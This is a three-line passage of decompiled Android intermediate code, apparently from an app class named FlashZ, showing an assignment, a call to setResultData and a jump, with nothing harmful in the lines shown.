  #L0374e0.  v1:= v20 @kind object;
  #L0374e4.  call `setResultData`(v0, v1) @signature `Lcom/adobe/flashplayer_/FlashZ;.setResultData:(Ljava/lang/String;)V` @kind virtual;
  #L0374ea.  goto L036d1c;
}
